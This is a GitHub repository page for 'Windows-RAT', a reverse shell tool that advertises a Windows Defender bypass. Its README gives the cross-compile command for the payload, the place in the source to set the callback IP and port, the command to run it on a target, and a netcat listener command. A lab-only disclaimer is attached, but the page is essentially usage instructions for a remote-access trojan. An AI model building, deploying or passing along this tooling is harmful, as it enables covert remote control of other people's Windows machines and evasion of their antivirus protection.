Skip to content

sermikr0/Windows-RAT

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Windows Defender Bypass Reverse Shell

License Platform Language Usage Status


Short description

Educational reverse shell for lab testing.
Do not use on systems you do not control.


Highlights

  • Purpose: training and isolated lab testing only.
  • Cross-compiled Windows executable.
  • Single IP config point in code.
  • Transfer and run only inside an isolated VM you control.

Build

Run this cross-compile command on your build host:

x86_64-w64-mingw32-g++ payload.cpp -o reverse.exe -static -lws2_32 -lshlwapi -lcomctl32

Configuration

Edit one place in the source:

// CONFIGURE_ME: change to your test-lab IP only
const char* SERVER_IP = "127.0.0.1";
const int SERVER_PORT = 4444;

Run (on test Windows VM)

Open cmd.exe or PowerShell on the isolated Windows VM:

reverse.exe

Listener (control machine)

Use a simple TCP listener on your control machine:

nc -lvnp 4444

Recommended practices

  • Create an isolated test network.
  • Use VMs you fully control.
  • Transfer files with controlled methods (SCP, secured share).
  • Never target third-party systems without explicit permission.

About

Windows remote hacked

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages